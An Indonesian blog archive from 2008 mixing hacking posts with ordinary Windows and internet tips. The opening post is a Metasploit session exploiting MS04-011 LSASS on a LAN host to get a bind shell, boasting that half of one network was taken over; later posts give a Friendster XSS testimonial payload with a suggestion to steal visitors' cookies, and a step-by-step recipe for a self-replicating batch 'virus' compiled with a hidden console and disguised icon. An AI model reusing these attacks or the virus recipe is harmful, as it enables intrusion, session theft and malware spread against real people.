888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]

msf >

untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow

3Com 3CDaemon FTP Server Overflow

Credits

afp_loginext

aim_goaway

apache_chunked_win32

arkeia_agent_access

arkeia_type77_macos

arkeia_type77_win32

backupexec_ns

bakbone_netvault_heap

blackice_pam_icq

cabrightstor_disco

cabrightstor_disco_servicepc

cabrightstor_uniagent

calicclnt_getconfig

calicserv_getconfig

distcc_exec

exchange2000_xexch50

globalscapeftp_user_input

ia_webmail

icecast_header

iis40_htr

iis50_printer_overflow

iis50_webdav_ntdll

iis_fp30reg_chunked

iis_nsiislog_post

iis_source_dumper

iis_w3who_overflow

imail_imap_delete

imail_ldap

irix_lpsched_exec

lsass_ms04_011

maxdb_webdbm_get_overflow

mercantec_softcart

minishare_get_overflow

msasn1_ms04_007_killbill

msmq_deleteobject_ms05_017

msrpc_dcom_ms03_026

mssql2000_preauthentication

mssql2000_resolution

netterm_netftpd_user_overflow

openview_omniback

oracle9i_xdb_ftp

oracle9i_xdb_ftp_pass

payload_handler

poptop_negative_read

realserver_describe_linux

samba_nttrans

samba_trans2open

samba_trans2open_osx

samba_trans2open_solsparc

sambar6_search_results

seattlelab_mail_55

sentinel_lm7_overflow

servu_mdtm_overflow

smb_sniffer

solaris_dtspcd_noir

solaris_kcms_readfile

solaris_lpd_exec

solaris_sadmind_exec

solaris_snmpxdmid

solaris_ttyprompt

squid_ntlm_authenticate

svnserve_date

trackercam_phparg_overflow

uow_imap4_copy

uow_imap4_lsub

ut2004_secure_linux

ut2004_secure_win32

warftpd_165_pass

warftpd_165_user

webstar_ftp_user

windows_ssl_pct

wins_ms04_045

wsftp_server_503_mkd

Metasploit Framework Credits

AppleFileServer LoginExt PathName Overflow

AOL Instant Messenger goaway Overflow

Apache Win32 Chunked Encoding

Arkeia Backup Client Remote Access

Arkeia Backup Client Type 77 Overflow (Mac OS X)

Arkeia Backup Client Type 77 Overflow (Win32)

Veritas Backup Exec Name Service Overflow

BakBone NetVault Remote Heap Overflow

ISS PAM.dll ICQ Parser Buffer Overflow

CA BrightStor Discovery Service Overflow

CA BrightStor Discovery Service SERVICEPC Overflo

CA BrightStor Universal Agent Overflow

CA License Client GETCONFIG Overflow

CA License Server GETCONFIG Overflow

DistCC Daemon Command Execution

Exchange 2000 MS03-46 Heap Overflow

GlobalSCAPE Secure FTP Server user input overflow

IA WebMail 3.x Buffer Overflow

Icecast (<= 2.0.1) Header Overwrite (win32)

IIS 4.0 .HTR Buffer Overflow

IIS 5.0 Printer Buffer Overflow

IIS 5.0 WebDAV ntdll.dll Overflow

IIS FrontPage fp30reg.dll Chunked Overflow

IIS nsiislog.dll ISAPI POST Overflow

IIS Web Application Source Code Disclosure

IIS w3who.dll ISAPI Overflow

IMail IMAP4D Delete Overflow

IMail LDAP Service Buffer Overflow

Irix lpsched Command Execution

Microsoft LSASS MSO4-011 Overflow

MaxDB WebDBM GET Buffer Overflow

Mercantec SoftCart CGI Overflow

Minishare 1.41 Buffer Overflow

Microsoft ASN.1 Library Bitstring Heap Overflow

Microsoft Message Queueing Service MSO5-017

Microsoft RPC DCOM MSO3-026

MSSQL 2000/MSDE Hello Buffer Overflow

MSSQL 2000/MSDE Resolution Overflow

NetTerm NetFTPD USER Buffer Overflow

HP OpenView Omniback II Command Execution

Oracle 9i XDB FTP UNLOCK Overflow (win32)

Oracle 9i XDB FTP PASS Overflow (win32)

Metasploit Framework Payload Handler

Poptop Negative Read Overflow

RealServer Describe Buffer Overflow

Samba Fragment Reassembly Overflow

Samba trans2open Overflow

Samba trans2open Overflow (Mac OS X)

Samba trans2open Overflow (Solaris SPARC)

Sambar 6 Search Results Buffer Overflow

Seattle Lab Mail 5.5 POP3 Buffer Overflow

SentinelLM UDP Buffer Overflow

Serv-U FTPD MDTM Overflow

SMB Password Capture Service

Solaris dtspcd Heap Overflow

Solaris KCMS Arbitary File Read

Solaris LPD Command Execution

Solaris sadmind Command Execution

Solaris snmpXdmid AddComponent Overflow

Solaris in.telnetd TTYPROMPT Buffer Overflow

Squid NTLM Authenticate Overflow

Subversion Date Svnserve

TrackerCam PHP Argument Buffer Overflow

University of Washington IMAP4 COPY Overflow

University of Washington IMAP4 LSUB Overflow

Unreal Tournament 2004 "secure" Overflow (Linux)

Unreal Tournament 2004 "secure" Overflow (Win32)

War-FTPD 1.65 PASS Overflow

War-FTPD 1.65 USER Overflow

WebSTAR FTP Server USER Overflow

Microsoft SSL PCT MS04-011 Overflow

Microsoft WINS MS04-045 Code Execution

WS-FTP Server 5.03 MKD Overflow

msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads

Metasploit Framework Usable Payloads
====================================

win32_adduser

win32_bind

win32_bind_dllinject

win32_bind_meterpreter

win32_bind_stg

win32_bind_stg_upexec

win32_bind_vncinject

win32_exec

win32_passivex

win32_passivex_meterpreter

win32_passivex_stg

win32_passivex_vncinject

win32_reverse

win32_reverse_dllinject

win32_reverse_meterpreter

win32_reverse_ord

win32_reverse_ord_vncinject

win32_reverse_stg

win32_reverse_stg_upexec

win32_reverse_vncinject

Windows Execute net user /ADD

Windows Bind Shell

Windows Bind DLL Inject

Windows Bind Meterpreter DLL Inject

Windows Staged Bind Shell

Windows Staged Bind Upload/Execute

Windows Bind VNC Server DLL Inject

Windows Execute Command

Windows PassiveX ActiveX Injection Payload

Windows PassiveX ActiveX Inject Meterpreter Payload

Windows Staged PassiveX Shell

Windows PassiveX ActiveX Inject VNC Server Payload

Windows Reverse Shell

Windows Reverse DLL Inject

Windows Reverse Meterpreter DLL Inject

Windows Staged Reverse Ordinal Shell

Windows Reverse Ordinal VNC Server Inject

Windows Staged Reverse Shell

Windows Staged Reverse Upload/Execute

Windows Reverse VNC Server Inject

msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Automatic

msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444

C:\WINDOWS\system32> netstat -a
netstat -a

Active Connections

Protocol

Local Address

Foreign Address

State

TCP

UDP

kicks:epmap

kicks:microsoft-ds

kicks:1025

kicks:1056

kicks:1090

kicks:1095

kicks:1098

kicks:1130

kicks:4444

kicks:5000

kicks:netbios-ssn

kicks:1162

kicks:1169

kicks:4444

kicks:microsoft-ds

kicks:isakmp

kicks:ntp

kicks:1900

kicks:ntp

kicks:netbios-ns

kicks:netbios-dgm

kicks:1900

0.0.0.0:0

192.168.0.10:1382

*:*

LISTENING

ESTABLISHED

^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >

Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).

XSS Pada Friendster

2008-12-13T14:42:00.001+07:00

Date: Thursday, May 25, 2006 Hits: 65 By: LEQHI

Setelah demam Friendster merebak,banyak hacker mencari celah untuk menebus web tersebut.

Sudah ada beberapa contoh dalam article di jasakom yang mendapatkan celah pada web Friendster.com XSS memang tdk dpt dihindari bila web memperbolehkan semua orang mengirim/menerima sesuatu dalam bentuk html code.Seperti Friendster,mereka memperbolehkan meng-edit page mereka sndiri dengan html code.Dan Testimonial,juga diperbolehkan menggunakan html code.
Langsung saja

Browse
1.http://www.Friendster.com
2.login
3.Kirimkan Testimonial Kepada Siapapun dengan code Language="JavaScript">alert(document.cookie)

Kemudian apa yang muncul..cookie dari web Friendster yang tesimpan di komputer kita Bila kita ingin jahat,maka curi saja cookienya.Maka cooki dari setiap org yang mengakses web tersebut secara otomastis akan masuk ke dalam page "curian" yang telah kita buat.

Cara Mudah Melawan Semua Virus Local Tanpa Antivirus

2008-12-13T14:40:00.000+07:00

Setelah merasa senang (?!?!) akan hadirnya anak-anak bangsa yang sudah mulai jago bikin virus, akhirnya bosen juga..... abisan gitu-gitu doang. Contoh : Kangen, Riyani Jangkaru, Brontok, trus Romantic Devil. Ah itu mah cemen abis.

Caranya gampang siapin aja :
1. Virusnya (kalo gak punya, bisa minta ama warnet2 terdekat hohoho)
2. Hijack Tools yang bs di download di
http://www.spywareinfo.com/~merijn/downloads.html
3. Tidak diperlukan keahlian yang amat sangat.

Ternyata virus-virus local emang memiliki ciri yang sangat khas diantaranya mendisablekan run, regedit, task manager, sama search. Untuk brontok penduplikatan diri hanya berbatas penduplikatan file .EXE tapi kalo Romantic Devils lebih canggih, virus ini selain menduplikatkan diri juga mengirimkan string ke registry seiring penduplikatannya itu, tapi cuman butuh 10 menit buatlinnya hohoho.

Oke langsung saja :

1. Aktifin HijackThis

2. Trus cari :

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies,DisableRegedit=1, langsung klik [Fix checked], ini buat balikin fungsi regedit.

Trus Cari yang sekiranya mencurigakan, contoh bron-spizaetus, empty.pif, bronstab.exe. kalo kangen ccapps, kalo romantic devil sysria dll.

3. Sekarang masuk ke regedit (kita belum ngaktifin run, jadi lewat manual ke windows\regedit), trus cari yang aneh-aneh misal kalo brontok cari
values : bron-spizaetus, tok-cirrhatus, dll. Trus langsung hapus bleh

4. Nah buat balikin fungsi yang di matiin (Run, Search, Folder Options) cari di
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, trus langsung delete aja, atau ubah stringnya jadi (0). Misalnya
NoRun Reg_dword 0x00000000 (1) di ubah jadi NoRun Reg_dword 0x00000000 (0). Arti dari 1 adalah true dan 0 adalah false itu kata dosen COA gw.

5. Kemudian search *.exe, cari yang ukuran filenya sama dan ikon berbentuk folder tanpa dosa (20 kb, 40 kb, 80kb tergantung variantnya). Trus hapus.

6. Sekarang tinggal nunggu virus baru dan siap basmi hohoho

Bikin Virus Dengan Perintah CMD

2008-12-13T14:39:00.001+07:00

Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.

Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya â€œ copy %0 c:\ â€œ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah â€œfor %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe â€œ .

Perintah ini berarti â€œ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe â€œ. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya â€œ explorer %userprofile% â€œ.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti â€œuntuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exeâ€. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnyaâ€¦.dan seterusnya pikirkan sendiri perintahnyaâ€¦..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy â€œ%%aâ€ c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy â€œ%%aâ€ c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.

Keterangan:
Pada contoh perintah diatas â€œfor %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe â€œ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi â€œ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe â€œ

TubeTilla YouTube Downloader 3.0

2008-12-12T21:38:00.002+07:00

Download videos from YouTube and convert them to several formats like MP3, MP4 and WMV.
Features:

FREE YouTube Downloader
FREE YouTube Music Downloader.
FREE YouTube Converter
Convert YouTube videos to MP4, MP3 and WMV.
Fast downloading for even modem users.
Save YouTube videos to your PC as a backup.

Download Di :
www.freewarecorner.com/tubetilla-youtube-downloader-30.html

World Theme for your Symbian s60 3th edition

2008-12-12T21:23:00.001+07:00

Free Strange World Theme for your Symbian s60 3th edition.

Download: to free Download

Sponsors:

Related Softwares:

Tips MS Word

2008-12-12T21:06:00.001+07:00

Menampilkan screen tips

Screen tips merupakan tulisan yang muncul saat pointer mouse diletakkan di atas icon pada toolbar. Dengan menampilkan screen tips tersebut Anda dapat melihat shortcut untuk icon tertentu sehingga nantinya Anda dapat bekerja lebih efisien dengan bantuan shortcut tersebut.
Langkah-langkahnya sebagai berikut :
1. Klik menu Tools - Customize.
2. Pindah ke tab Options.
3. Beri tanda check pada Show screen tips on toolar.
4. Klik OK.

Mengganti ukuran dalam centimeter
Secara default ukuran panjang dan lebar document pada MS Word adalah dalam Inches. Anda bisa menggantinya dengan ukuran centimeter atau yang lainnya sesuai keinginan Anda. Caranya sbb :
1. Klik menu Tools - Options.
2. Pindah ke tab General.
3. Pada measurement units Anda tingal pilih sesuai yang Anda sukai (centimeter, inches, points, picas).
4. Klik OK.

Meningkatkan performa komputer Anda

2008-12-12T21:04:00.000+07:00

Klik kanan My Computer, pilih Properties. Pada tab Performance pilih Virtual Memory. Pilih Let me specify my own virtual memory setting. Pada bagian Minimum dan Maximum, isi dengan 2 atau 3 kali RAM Anda. Jadi jika Anda punya RAM 32 Mb, isi dengan 64 Mb.

Mengganti logo startup

Pada saat start, maka Windows akan memanggil file logo.sys yang terletak di directory utama (C:\). File logo.sys merupakan hidden file, jadi untuk melihatnya buka Windows Explorer, klik View - Folder Option. Pidah ke tab View, beri tanda check pada Show All Files. Klik OK. Lalu dengan Windows Explorer, klik kanan pada file logo.sys, pilih properties dan hilangkan semua tanda check.
Buat backup file/cadangan jika perlu.
Pindah ke DOS prompt. Pindah ke directory utama (c:\). Ketikkan "ren logo.sys logo.bmp" (tanpa tanda petik).
Buka file logo.bmp tersebut dengan editor image favorit Anda (Paint, PhotoShop, PhotoPaint, dll).
Edit gambar seperlunya dan simpan kembali sebagai file logo.bmp.
Kembali ke DOS prompt, ganti nama logo.bmp dengan logo.sys dengan mengetikkan ren logo.bmp logo.sys.
Restart Windows.

Apabila Anda ingin mengganti dengan gambar yang lain, maka hal-hal yang perlu diperhatikan adalah :

Gambar yang akan digunakan sebagai ganti mempunyai warna sebanyak 256.
Ukuran file kurang lebih 127 kb.
Besar/ukuran gambar 320 x 400 pixels
Ekstensi harus .sys.

Mengganti logo Shut Down

Pada saat shutdown, file yang dijalankan adalah logow.sys (please white while.....) dan logos.sys (it's now save to ......). Kedua hidden file tersebut terletak di directory windows (biasanya C:\Windows). Untuk mengganti kedua gambar tersebut caranya seperti di atas. Kalau Anda tidak mau repot-repot mengedit file, Anda bisa menggunakan software (salah satunya) Win Logo Changer untuk mengganti layar start up dan shut down

Menghapus file TEMP

Tambahkan baris berikut pada file autoexec.bat Anda :

if not exist %TEMP%\*.TMP goto EndTMP
atrrib %TEMP%\*.TMP -r -a -s -h
del %TEMP%\*.TMP
:EndTMP
Maka mulai sekarang tiap kali komputer Anda di-booting, secara otomatis akan menghapus file-file *.TMP.

Shortcut ke pengaturan system

Biasanya anda harus mengklik kanan desktop lalus Properties untuk mengatur tampilan desktop Windows 95. Sebenarnya ada cara yang lebih cepat yaitu dengan menggunakan shortcut. Caranya :
1. Klik kanan pada desktop, pilih New - Shortcut.
2. Pada command line, ketikkan C:\WINDOWS\CONTROL.EXE Sysdm.cpl, System,1
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Shortcut untuk Shutdown

2008-12-12T20:58:00.006+07:00

Untuk mempercepat shutdown Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New - Shortcut.
2. Pada command line ketikkan c:\windows\rundll32.exe user, exitwindows.
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Shortcut untuk Restart

Untuk mempercepat restart Anda bisa membuat shortcut pada desktop.
Cara 1 :
1. Klik kanan area kosong pada desktop, pilih New - Shortcut.
2. Pada command line ketikkan C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec.
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Cara 2 :
1. Jalankan Notepad.
2. Ketikkan @exit.
3. Simpan dengan nama restart.bat di C:\
4. Jalankan windows explorer, klik kanan dan seret file tersebut ke desktop.
5. Pada menu yang muncul pilih Create Shortcut(s) Here.
6. Klik kanan shortcut tersebut, pilih Properties.
7. Pindah ke tab Programs, beri tanda check pada Close on Exit.
8. Klik tombol Advanced.
9. Tandai pilhan MS-DOS Mode, serta hapus pilihan Warn before entering MS-DOS mode.
10. Klik OK, dan OK lagi untuk menutup kotak dialog Properties.

Shortcut untuk Log Off

Untuk mempercepat log off Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New - Shortcut.
2. Pada command line ketikkan C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Download semua shortcut

Mengganti assosiasi file dengan cepat

Untuk mengganti assosiasi file (program yang digunakan untuk membuka file) Anda tidak perlu masuk ke registry. Cara yang mudah adalah pilih file yang ingin dirubah. Tekan tombol Shift dan klik kanan pada file tersebut sehingga muncul menu Open with. Klik pada menu tersebut dan pilih program yang akan digunakan untuk membuka tipe file tersebut. Beri tanda check pada "Always use this program to open this type of file". Terakhir klik OK.

Mengganti warna Blue Screen of Death

Anda yang sudah akrab dengan Windows pasti pernah mengalami hal ini : layar tiba-tiba berwarna biru, tulisan putih dan komputer hang. Nah, Anda bisa mengganti warna tersebut dengan warna kesukaan Anda. Caranya, klik Start - Run, tuliskan sysedit. Pilih system.ini. Lalu cari yang ada tulisan [386Enh], dan tuliskan di bawahnya :
MessageTextColor= 8
MessageBackColor= 4
Ganti angka 8 dan 4 dengan warna kesukaan Anda (Black=0 Blue=1 Green=2 Cyan=3 Red=4 Magenta=5 Brown=6 White=7 Gray=8 Bright Blue=9 Bright Green=A Bright Cyan=B Bright Red=C Pink=D Yellow=E Bright White=F)

Mengganti icon drive

Bosan dengan icon drive yang monoton ? Ganti aja ! Caranya :
1. Jalankan Notepad.
2. Ketik :
[AutoRun]
Icon=C:\Icon\iconsatu.ico
(asumsi : terdapat file iconsatu.ico pada directory Icon. Anda bisa mengganti dengan letak file icon Anda)
3.Simpan dengan nama autorun.inf dan letakkan pada root directory drive C.

Bila ingin mengganti icon drive lainnya, tinggal ganti huruf C dengan huruf drive yang akan diganti.

Mengurutkan menu

2008-12-12T20:58:00.003+07:00

Kadang menu (shortcut) yang terletak pada Start - Programs tidak urut berdasarkan abjad sehingga acapkali membingunkan kita. Nah, untuk mengurutkan menu tersebut caranya sbb : klik Start - Programs, geser kursor ke kanan. Klik kanan dan pada menu yang muncul pilih Sort By Name.

Menghemat satu kali klik

2008-12-12T20:58:00.001+07:00

Untuk membuka atau menjalankan file biasanya kita harus melakukan klik dua kali pada file tersebut. Ada cara yang lebih cepat, yaitu cukup dengan sekali klik saja suatu file atau program dapat kita jalankan. Caranya sebagai berikut:

Buka Windows Explorer.
Dari menu View, pilih Folder Options.
Klik Tombol Settings....
Pada bagian Click items as Follows, pilih Single-click to open an item (point to select).
Klik OK, Apply dan terakhir Close.

Menghemat pulsa akses Internet

2008-12-12T20:56:00.002+07:00

Dalam berbagai kesempatan memberikan ceramah-ceramah di berbagai daerah, pertanyaan yang paling sering ditanyakan adalah "bagaimana caranya supaya akses Internet menjadi murah?" "koq pulsa telepon saya setelah menggunakan Internet menjadi Rp. 1 juta se bulan?" sekitar itu lah pertanyaan yang sering kali muncul.

Umumnya peserta ceramah-ceramah tersebut agak kaget setelah saya beritahukan bahwa pulsa telepon saya di rumah untuk Internet per bulan sekitar Rp. 200.000-an dan iuran ke ISP saya indo.net.id sekitar Rp. 40.000-an per bulan. Sebuah angka yang relatif kecil sekali di bandingkan dengan jumlah informasi yang saya terima setiap hari sekitar 600-700 e-mail.

Pada kesempatan ini akan saya coba jelaskan bagaimana strategi yang dapat kita gunakan supaya Internet menjadi murah. Strategi & trik-trik tersebut saya peroleh dari pengalaman sehari-hari di lapangan.

Yang pertama, saya lebih banyak menggunakan e-mail di Internet dibandingkan melakukan browsing & chatting. Praktis 98% waktu saya di Internet adalah menulis, mengirim & menerima e-mail - sangat sedikit sekali waktu yang saya berikan untuk melakukan browsing. Berbeda dengan browsing & surfing di Internet yang memposisikan kita sebagai konsumen informasi saja, dalam e-mail sering kali saya menjadi produsen informasi & langsung di sebarkan ke berbagai mailing list, secara filosofi menjadi produsen informasi akan jauh lebih menguntungkan & produktif daripada konsumen informasi. Menjelaskan sesuatu akan lebih baik daripada sekedar menerima penjelasan. E-mail juga merupakan media komunikasi interaktif dua arah sehingga secara filosofis juga lebih baik daripada web yang hanya satu arah saja.

Ada cukup banyak trik-trik yang bisa dilakukan dalam menggunakan e-mail tersebut, seperti saya lebih suka menggunakan e-mail account ISP bukan free Web based mail seperti yahoo.com, hotmail.com. Kalau di hitung benar-benar maka menggunakan e-mail account di ISP akan jauh lebih murah daripada yahoo & hotmail.

Tuliskan semua e-mail yang akan dikirim secara offline (modem tidak dimasukan ke telepon) dan di antrikan dalam antrian Outbox siap untuk dibuang ke Internet pada saat nanti modem di sambungkan. Hal ini tidak bisa dilakukan jika kita menggunakan free web mail seperti yahoo & hotmail. Jika menggunakan yahoo & hotmail telepon harus dinyalakan pada saat menulis e-mail jadi sangat merugikan. Apalagi kalau harus menulis / membaca ratusan mail setiap hari-nya.

Dengan menggunakan software e-mail seperti Eudora, Microsoft Outlook, Microsoft Outlook Express dengan sekali tekan tombol send-receive semua mail di Outbox akan dikirim ke Internet dan mail dari Internet di ambil masuk ke Inbox. Seluruh proses hanya akan membutuhkan waktu sekitar 3-5 menitan saja untuk transaksi sekitar 500-an mail dengan isi biasa-biasa saja (tidak ada attachment). Bayangkan kalau biaya yang kita bayar Rp. 150 / menit ke ISP & Telkom, maka hanya butuh sekitar Rp. 1000-2000 / hari untuk menerima & mengirim ratusan e-mail dari / ke Internet. Hal ini tidak mungkin dilakukan jika anda menggunakan Yahoo & Hotmail.

Jika anda sering memperoleh spamming / mail yang tidak di inginkan maka coba gunakan fasilitas filter yang di sediakan di mail software mail anda. Saya biasanya cukup sadiz dalam hal ini, sering kali kalau saya menerima junk mail tersebut, langsung e-mail address orang tersebut saya masukan ke daftar yang mail-nya harus saya delete di server. Kira-kira dalam fasilitas filter caranya eudora / outlook express diminta untuk melihat "From:" kalau cocok e-mail address-nya perintahkan untuk di delete di server saja mailnya jangan di download ke PC kita - dengan cara itu akan sangat membantu meringankan beban telepon kita.

Saya harus akui bahwa saya tidak ada waktu untuk melakukan IRC / chatting karena saya sangat mobile sekali memberikan ceramah-ceramah jadi tidak mungkin melakukan IRC. Akhirnya e-mail menjadi pilihan yang paling natural dengan kondisi bekerja yang demikian mobile.

Bagaimana dengan Web? Akses ke Web memang penting terutama jika kita membutuhkan informasi / pengetahuan yang spesifik akan suatu hal. Kondisi saya memang agak berbeda dengan kebanyakan orang karena saya menggunakan laptop dengan fasilitas modem & ethernet yang bisa disambungkan ke LAN / Telepon dimana saja.

Ada beberapa hal yang mungkin bisa dilakukan agar akses Web yang kita lakukan dapat dilakukan secara effisien dan hemat pulsa. Saya coba memberikan beberapa trik yang mungkin akan membantu bagi kebanyakan orang yang menggunakan PC biasa dengan fasilitas dial-up dari rumah. Satu hal yang akan sangat membantu adalah mengakses Web dipagi hari (tepatnya subuh) sekitar jam 4-6 pagi, karena di waktu itu adalah waktu dimana traffik ke / dari Internet ke Indonesia sedang dalam posisi terendah - artinya tidak banyak orang yang menggunakan Internet dari Indonesia oleh karena itu jika kita mengakses Web di jam itu maka akan sangat terasa sekali bedanya di bandingkan di jam kerja apalagi jam 12 siang atau jam 4 sore hari dimana di situ adalah titik-titik tertinggi traffik Internet di Indonesia. Berbeda dengan akses Web, hal ini tidak berlaku bagi akses e-mail yang secara prinsip anda bisa melakukannya kapan saja karena akses e-mail hanya ke server mail lokal di ISP.

Selanjutnya pada saat akses Web, kita harus tahu secara pasti informasi / pengetahuan apa yang ingin kita cari di Internet - jangan sampai kita mengakses Web tanpa tujuan ang jelas - karena hampir dapat dipastikan hasilnya akan mubazir & akhirnya yang dicari hanya gambar-gambar saja yang membuang uang percuma - menurut saya, tentunya mungkin tidak percuma bagi yang ingin melampiaskan napsunya

Gunakan search engine seperti www.yahoo.com atau www.infoseek.com untuk mencari informasi / pengetahuan yang kita perlukan dengan memasukan keyword yang sesuai dengan pengetahuan tersebut. Misalnya kita tertarik dengan bisnis di Internet, bisa digunakan keyword e-commerce, small business atau spesifik di bidang yang kita inginkan.

Jika anda menggunakan Internet explorer maka ada baiknya menggunakan fasilitas "favourite" yang menyimpan halaman Web yang dinginkan dan di set pada saat kita masukan ke "favourite" supaya halaman Web bisa dibaca nantinya secara offline tanpa menyalakan modem. Penggunaan Web favourite yang bisa dibaca offline akan sangat membantu supaya kita tidak perlu membaca secara detail pada saat kita online di Internet tapi di save saja semuanya supaya nanti pada saat semua halaman sudah di download dan modem sudah di putuskan maka kita bisa membaca secara detail pengetahuan yang kita peroleh sambil santai minum kopi tanpa perlu kuatir membayar pulsa telkom yang mahal itu.

Fasilitas lain yang juga sangat membantu adalah fasilitas synchronize juga ada di dalam fasilitas favourite yang akan mensinkronisasi halaman Web yang kita inginkan apakah itu untuk meng-update supaya lebih baru lagi, atau juga untuk mengambil 2-3 link di bawah-nya sekaligus tanpa perlu kita meng-klik satu per satu link tersebut dan memasukan ke dalam favourite untuk di baca offline.

Jika anda adalah pengakses Internet yang cukup serius sebaiknya mencoba berfikir untuk meminta saluran telepon koin ke Telkom untuk diletakan dirumah anda. Bukannya apa-apa telepon koin pulsa-nya sekitar 40% lebih murah dibandingkan dengan telepon biasa. Kekurangan dari telepon koin adalah, saluran ini tidak bisa digunakan untuk menerima telepon hanya bisa digunakan untuk menelepon saja - untuk penggunaan Internet saluran telepon koin akan sangat ideal sekali karena Internet memang tidak membutuhkan kemampuan untuk menerima telepon karena selalu akan menelepon ke ISP saja.

Kira-kira demikian sebagian dari trik-trik yang dapat digunakan untuk menghemat pulsa anda dalam mengakses Internet. Mudah-mudahan bisa membantu anda dalam mengakses Internet secara murah meriah.

Mengganti icon shortcut

2008-12-12T20:56:00.001+07:00

